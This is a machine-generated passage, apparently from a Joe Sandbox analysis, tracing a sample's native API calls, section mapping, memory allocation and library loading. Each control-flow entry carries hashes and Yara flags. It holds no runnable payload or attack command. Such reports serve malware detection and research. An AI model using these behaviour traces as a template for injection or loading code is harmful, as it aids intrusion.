2 API calls 99774->99775 99776 2549943 99775->99776 99782 2549be4 99776->99782 99791 254bd80 LdrLoadDll 99776->99791 99778 2549bc9 99779 2549bd0 99778->99779 99778->99782 99780 254bdc0 2 API calls 99779->99780 99781 2549bda 99780->99781 99781->99737 99783 254bdc0 2 API calls 99782->99783 99784 2549c39 99783->99784 99784->99737 99786 2539335 99785->99786 99787 253acf0 LdrLoadDll 99786->99787 99788 2539368 99787->99788 99790 253938d 99788->99790 99792 253cf20 99788->99792 99790->99768 99791->99778 99793 253cf4c 99792->99793 99794 254a1e0 LdrLoadDll 99793->99794 99795 253cf65 99794->99795 99796 253cf6c 99795->99796 99803 254a220 99795->99803 99796->99790 99800 253cfa7 99801 254a490 2 API calls 99800->99801 99802 253cfca 99801->99802 99802->99790 99804 254a23c 99803->99804 99805 254af60 LdrLoadDll 99803->99805 99811 47c2ca0 LdrInitializeThunk 99804->99811 99805->99804 99806 253cf8f 99806->99796 99808 254a810 99806->99808 99809 254af60 LdrLoadDll 99808->99809 99810 254a82f 99809->99810 99810->99800 99811->99806 99813 254af60 LdrLoadDll 99812->99813 99814 2549eac 99813->99814 99817 47c2dd0 LdrInitializeThunk 99814->99817 99815 253f6ae 99815->99669 99817->99815 99821 47c2ad0 LdrInitializeThunk

                                  Control-flow Graph

                                  APIs
                                  • NtQueryInformationProcess.NTDLL ref: 0453A19F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766510166.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4530000_control.jbxd
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID: 0
                                  • API String ID: 1778838933-4108050209
                                  • Opcode ID: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                  • Instruction ID: 151e8d44cf82d008d8d7b2aace733d23be61a8540fc1246609d9bcf6694ef208
                                  • Opcode Fuzzy Hash: 7bc916a415ef614ffafa7f75d0ec115445e44d1b24a8fe03bb76e065ae57333e
                                  • Instruction Fuzzy Hash: DFF17170918A8D8FDBA5EF68C884AEEB7F0FF98305F40462AD44AD7250DF34A641DB41

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 209 4539baf-4539bef 210 4539bf7-4539bfe 209->210 211 4539bf2 call 4539102 209->211 212 4539c00 210->212 213 4539c0c-4539c9a call 453b942 * 2 NtCreateSection 210->213 211->210 215 4539c02-4539c0a 212->215 219 4539ca0-4539d0a call 453b942 NtMapViewOfSection 213->219 220 4539d5a-4539d68 213->220 215->213 215->215 223 4539d52 219->223 224 4539d0c-4539d4c 219->224 223->220 226 4539d69-4539d6b 224->226 227 4539d4e-4539d4f 224->227 228 4539d88-4539ddc call 453cd62 NtClose 226->228 229 4539d6d-4539d72 226->229 227->223 230 4539d74-4539d86 call 4539172 229->230 230->228
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766510166.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4530000_control.jbxd
                                  Similarity
                                  • API ID: Section$CloseCreateView
                                  • String ID: @$@
                                  • API String ID: 1133238012-149943524
                                  • Opcode ID: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                  • Instruction ID: bb180ab8c7bcef046c335b767bc74e31466610ab94c5d66aec7157f6c5fdd8de
                                  • Opcode Fuzzy Hash: db7dcd85dc853400a789dde9de35cb8114d6383d98fd4a16120e7ccab82aa783
                                  • Instruction Fuzzy Hash: 7061C4B051CB098FCB58DF58D8856AABBE0FF98315F50062EE58AC3251DF75E441CB86

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 268 4539bb2-4539bfe call 4539102 271 4539c00 268->271 272 4539c0c-4539c9a call 453b942 * 2 NtCreateSection 268->272 274 4539c02-4539c0a 271->274 278 4539ca0-4539d0a call 453b942 NtMapViewOfSection 272->278 279 4539d5a-4539d68 272->279 274->272 274->274 282 4539d52 278->282 283 4539d0c-4539d4c 278->283 282->279 285 4539d69-4539d6b 283->285 286 4539d4e-4539d4f 283->286 287 4539d88-4539ddc call 453cd62 NtClose 285->287 288 4539d6d-4539d72 285->288 286->282 289 4539d74-4539d86 call 4539172 288->289 289->287
                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766510166.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4530000_control.jbxd
                                  Similarity
                                  • API ID: Section$CreateView
                                  • String ID: @$@
                                  • API String ID: 1585966358-149943524
                                  • Opcode ID: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                  • Instruction ID: f25bfa47fd492f1458c7af6bf5827aff222bfe47c28235dd2c363382aa0fc482
                                  • Opcode Fuzzy Hash: d19581801156352ea8c1368f03ac477e7143ca4b49b2be0ea58d8e64d299f740
                                  • Instruction Fuzzy Hash: 1B519EB0618B098FD758DF18D8856AABBE0FF88314F50062EE98EC3651DF75E441CB86

                                  Control-flow Graph

                                  APIs
                                  • NtQueryInformationProcess.NTDLL ref: 0453A19F
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766510166.0000000004530000.00000040.00000800.00020000.00000000.sdmp, Offset: 04530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4530000_control.jbxd
                                  Similarity
                                  • API ID: InformationProcessQuery
                                  • String ID: 0
                                  • API String ID: 1778838933-4108050209
                                  • Opcode ID: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                  • Instruction ID: 050eccbec240225dc5bb06ab55500d7be1a88ee8cd84384ce11398a1304efdbe
                                  • Opcode Fuzzy Hash: 4a13b2017a61ababd9bba988d9a9b5b8b8f576b3da72e298de5122239bed11ad
                                  • Instruction Fuzzy Hash: E9514E70914A8C8FDBA9EF68C8946EEB7F4FB98305F40462ED44AD7211DF30A645DB41

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 548 254a35a-254a3b1 call 254af60 NtCreateFile
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02544BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02544BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0254A3AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 7c417f45352538f3dbc70b9006c8c35baf7fa9f0c61c4a99e0ec42fa983afd1d
                                  • Instruction ID: 01cb8869ac7ae82d9c2c5b19910e646c3b38dd356edc8a3d88c376d7717d69f9
                                  • Opcode Fuzzy Hash: 7c417f45352538f3dbc70b9006c8c35baf7fa9f0c61c4a99e0ec42fa983afd1d
                                  • Instruction Fuzzy Hash: 3501E4B2241108BFCB48CF88CC90DEB77E9AF8C754F158608FA0DD7240D630E8418BA0

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 551 254a360-254a376 552 254a37c-254a3b1 NtCreateFile 551->552 553 254a377 call 254af60 551->553 553->552
                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,02544BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,02544BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0254A3AD
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: 095cb4913ddacf0cf376a742b2e7916ff30b365a1037b378b769378b5336e6ca
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 36F0B2B2200208ABCB48CF88DC94EEB77ADAF8C754F158248BA0D97240C630E8118BA4
                                  APIs
                                  • NtReadFile.NTDLL(02544D72,5EB65239,FFFFFFFF,02544A31,?,?,02544D72,?,02544A31,FFFFFFFF,5EB65239,02544D72,?,00000000), ref: 0254A455
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: f01be71a311c8b5cd4951c4107c382e30abe96617a22fe1c69b32251c4ec43bb
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: E6F0A4B6200208ABDB14DF89DC90EEB77ADEF8C754F158248BE1D97241DA30E8118BA4
                                  APIs
                                  • NtReadFile.NTDLL(02544D72,5EB65239,FFFFFFFF,02544A31,?,?,02544D72,?,02544A31,FFFFFFFF,5EB65239,02544D72,?,00000000), ref: 0254A455
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID:
                                  • API String ID: 2738559852-0
                                  • Opcode ID: 502a9b782b303b8a28e01c6a188142a589d386d33725d39a54a7567b0150e13c
                                  • Instruction ID: 5f2234411f3ab0d0b1145621081cf66514be79ba69607840baff55eb7b34e337
                                  • Opcode Fuzzy Hash: 502a9b782b303b8a28e01c6a188142a589d386d33725d39a54a7567b0150e13c
                                  • Instruction Fuzzy Hash: 49F017B6200149ABCB04DFA8D990CEBB7ADFF8C318B15864DFD5D97201C634E8558BA4
                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,02532D11,00002000,00003000,00000004), ref: 0254A579
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 1875fa96e08602fb96cf770301cd2ea3634e8e92a312105506a5396a77f74ee7
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: 95F015B6200208ABDB14DF89CC80EAB77ADEF88754F118248BE0897241C630F811CBA4
                                  APIs
                                  • NtClose.NTDLL(02544D50,?,?,02544D50,00000000,FFFFFFFF), ref: 0254A4B5
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID:
                                  • API String ID: 3535843008-0
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: 7e80abd9c8a63d7d52b4e76702afe2c5e0f80d68bf8927681d3961e9cf88c6c8
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: B0D012762402147BD710EB98CC45E97775DEF84754F154555BA185B241C530F50086E0
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 969396c496c778867035519a4077cfc28704438fba3e110b9787af8c732c86fa
                                  • Instruction ID: 2371165cc3979c44bbd88dd0239d1ad66b942af6c53810d864bbc0c3834b7967
                                  • Opcode Fuzzy Hash: 969396c496c778867035519a4077cfc28704438fba3e110b9787af8c732c86fa
                                  • Instruction Fuzzy Hash: E190023561551402F1107158451470610258BD0205F66C421A0525578D8795DA5165A3
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 6b5399e402164b57b65805380de27067da0fe9127d9a09bf40ee092ca2ba18f0
                                  • Instruction ID: 04ad1aca25ecfbc333dc90cc8bf8d080045fced0e6f1c983c576dbeb9ed0ce0f
                                  • Opcode Fuzzy Hash: 6b5399e402164b57b65805380de27067da0fe9127d9a09bf40ee092ca2ba18f0
                                  • Instruction Fuzzy Hash: 6890023521149802F1207158840474A00258BD0305F5AC421A4525678D8695D9917122
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5c7254fcbf5405dc2ec9d322497c22d2978afcfafb1e9da9a7e4c9a0337d2df7
                                  • Instruction ID: 739ca9f4f9ebb5346da7671796f3f29602c611bf04f269e54c77bb904c6fc183
                                  • Opcode Fuzzy Hash: 5c7254fcbf5405dc2ec9d322497c22d2978afcfafb1e9da9a7e4c9a0337d2df7
                                  • Instruction Fuzzy Hash: CB90023521141842F11071584404B4600258BE0305F56C026A0225674D8615D9517522
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 42852b8ba195b1cc447ee7fff0346ab384ab5b9943fb5367fbd3f680aa662688
                                  • Instruction ID: b0c8b1b9d89b6681c10f110819601343b1106fede93b04ed7c28cdda64a4bcce
                                  • Opcode Fuzzy Hash: 42852b8ba195b1cc447ee7fff0346ab384ab5b9943fb5367fbd3f680aa662688
                                  • Instruction Fuzzy Hash: BE90023521141402F1107598540864600258BE0305F56D021A5125575EC665D9916132
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 9c061b5bc5cfee3ba4a56a882f77a2bb7e9a4326cfe88a6880babf0b979ddca4
                                  • Instruction ID: 42ef9a698eb7bff1014cc742f08ffdb6eb445a98398d5e9ff0301a2c5b5f7cec
                                  • Opcode Fuzzy Hash: 9c061b5bc5cfee3ba4a56a882f77a2bb7e9a4326cfe88a6880babf0b979ddca4
                                  • Instruction Fuzzy Hash: C390022D22341002F1907158540860A00258BD1206F96D425A0116578CC915D9695322
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b25f8578b230b842a470679ce075a2b43d105babc09164067e33ea1f54418031
                                  • Instruction ID: e201b741e320f292ac2f6b2efbab26c6fb2227883a1e8350442b7a4ed63a2ea9
                                  • Opcode Fuzzy Hash: b25f8578b230b842a470679ce075a2b43d105babc09164067e33ea1f54418031
                                  • Instruction Fuzzy Hash: 2F90023521141413F1217158450470700298BD0245F96C422A0525578D9656DA52A122
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: a406cb3e1965fbd08284d7407a8b750f184e29f959d089ec8beab3914d24eb7d
                                  • Instruction ID: 3477de52ddc57e6b6dab2908beb0797d1ed5075dc1ab0a5bb1554246d4e75f75
                                  • Opcode Fuzzy Hash: a406cb3e1965fbd08284d7407a8b750f184e29f959d089ec8beab3914d24eb7d
                                  • Instruction Fuzzy Hash: 84900225252451527555B158440450740269BE0245796C022A1515970C8526E956D622
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: e821362dbfb07bab67d42aff68969c45d797a2685f08004eed5778122aaa98f7
                                  • Instruction ID: e70a42116ab1ddd054437f320af2f7824c864769a4a569e98a966303604cb90c
                                  • Opcode Fuzzy Hash: e821362dbfb07bab67d42aff68969c45d797a2685f08004eed5778122aaa98f7
                                  • Instruction Fuzzy Hash: CA90027521141402F1507158440474600258BD0305F56C021A5165574E8659DED56666
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 29eaf0a9bc8a9807567abe70f23962be63ebb7c0d36fd41394062a697ae5ffd2
                                  • Instruction ID: e292c81da1eb5ee52cba6a34bb993ac62bd4cc7662301e7d73ec92faa2507545
                                  • Opcode Fuzzy Hash: 29eaf0a9bc8a9807567abe70f23962be63ebb7c0d36fd41394062a697ae5ffd2
                                  • Instruction Fuzzy Hash: 1790026535141442F11071584414B060025CBE1305F56C025E1165574D8619DD526127
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ab5f936d774e19e5f9fedb33faea8b60fe50a2eae6b5d6a03a8c3d84584c9d4d
                                  • Instruction ID: adb9fc78d02a4198befd458c8ef96766612af3f7ff995f3c3e7e5ce3cd9ab59f
                                  • Opcode Fuzzy Hash: ab5f936d774e19e5f9fedb33faea8b60fe50a2eae6b5d6a03a8c3d84584c9d4d
                                  • Instruction Fuzzy Hash: 6F900225221C1042F21075684C14B0700258BD0307F56C125A0255574CC915D9615522
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 5e37dda580b7cef9cb5ba1ccf01ef3cc233271f4c540b12e03715dee93e73024
                                  • Instruction ID: 35f0f51c100f1a6977ee16f44f882d6c51214116b743856cd0100c985f4b1c1d
                                  • Opcode Fuzzy Hash: 5e37dda580b7cef9cb5ba1ccf01ef3cc233271f4c540b12e03715dee93e73024
                                  • Instruction Fuzzy Hash: 9F900229221410032115B558070450700668BD5355356C031F1116570CD621D9615122
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: aa5530af661971b6ad2175a03a6242748adf75f9cefc38bdb38dc0abec1a872f
                                  • Instruction ID: fa298541c8e28e08e871563fbad70da0b1160b163f16b290bfe19e03d8de644b
                                  • Opcode Fuzzy Hash: aa5530af661971b6ad2175a03a6242748adf75f9cefc38bdb38dc0abec1a872f
                                  • Instruction Fuzzy Hash: 1990026521241003611571584414616402A8BE0205B56C031E11155B0DC525D9916126
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c9411904eb00e92b8886db3178861991f3314c766695fadfa1b899e77c97651d
                                  • Instruction ID: f4f72bc8c25152d985a40ebb9a3d6eccc1a9112476bf9592b0129258e1d2ea45
                                  • Opcode Fuzzy Hash: c9411904eb00e92b8886db3178861991f3314c766695fadfa1b899e77c97651d
                                  • Instruction Fuzzy Hash: 4690023521141802F1907158440464A00258BD1305F96C025A0126674DCA15DB5977A2
                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3766688092.0000000004750000.00000040.00001000.00020000.00000000.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000008.00000002.3766688092.0000000004879000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.000000000487D000.00000040.00001000.00020000.00000000.sdmp
                                  • Associated: 00000008.00000002.3766688092.00000000048EE000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_4750000_control.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: ea37c2b6c3f43bc0217b0312ff0850053546a505ade57199895ddb4cf9e72ea6
                                  • Instruction ID: 26c6790c1dfebd15df2ac7dc1145904f53d6d71bb41f8103d6cae427028b0ddb
                                  • Opcode Fuzzy Hash: ea37c2b6c3f43bc0217b0312ff0850053546a505ade57199895ddb4cf9e72ea6
                                  • Instruction Fuzzy Hash: 4290023521545842F15071584404A4600358BD0309F56C021A01656B4D9625DE55B662

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 405 2549080-25490af 406 25490bb-25490c2 405->406 407 25490b6 call 254bd40 405->407 408 254919c-25491a2 406->408 409 25490c8-2549118 call 254be10 call 253acf0 call 2544e50 406->409 407->406 416 2549120-2549131 Sleep 409->416 417 2549196-254919a 416->417 418 2549133-2549139 416->418 417->408 417->416 419 2549163-2549183 418->419 420 254913b-2549161 call 2548ca0 418->420 421 2549189-254918c 419->421 422 2549184 call 2548eb0 419->422 420->421 421->417 422->421
                                  APIs
                                  • Sleep.KERNELBASE(000007D0), ref: 02549128
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000008.00000002.3765357944.0000000002530000.00000040.80000000.00040000.00000000.sdmp, Offset: 02530000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_8_2_2530000_control.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Sleep
                                  • String ID: net.dll$wininet.dll
                                  • API String ID: 3472027048-1269752229
                                  • Opcode ID: a4826623e7868b6d09aa693b87d54e3f9d130cbf8debe4ac90b6fe1b62c8f438
                                  • Instruction ID: b1af3abf4fc304a07bf63580649676b39e73c941715cdf0912e72a4fac36b3e7
                                  • Opcode Fuzzy Hash: a4826623e7868b6d09aa693b87d54e3f9d130cbf8debe4ac90b6fe1b62c8f438
